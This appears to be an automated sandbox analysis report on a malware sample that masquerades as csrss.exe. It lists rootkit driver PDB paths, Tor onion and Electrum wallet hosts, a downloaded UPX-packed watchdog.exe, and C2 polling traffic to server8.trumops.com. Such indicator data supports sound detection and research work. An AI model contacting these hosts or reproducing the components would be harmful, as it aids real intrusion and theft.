            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: 4t4y4r89UZ.exe, 00000000.00000003.284065740.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: 4t4y4r89UZ.exe, 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: csrss.exe, 00000022.00000003.354545584.0000000005FB0000.00000004.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Nov 2021 00:57:46 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 3465Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mUdca%2FhPVx%2BcuIN0mD4co%2Fq%2B%2FeXbPU6Zq0S%2FW1p4uyl4SjDH8JZzFzI5IDyMwm0EeLJ8hLsHyRpILoj74RMKgCuPLLbsz17avF1sdGfbIzhrwOIhomElDn412zdD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6ac39180d8125c92-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Length: 652Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server8.trumops.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0Content-Length: 668Accept-Encoding: gzip
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
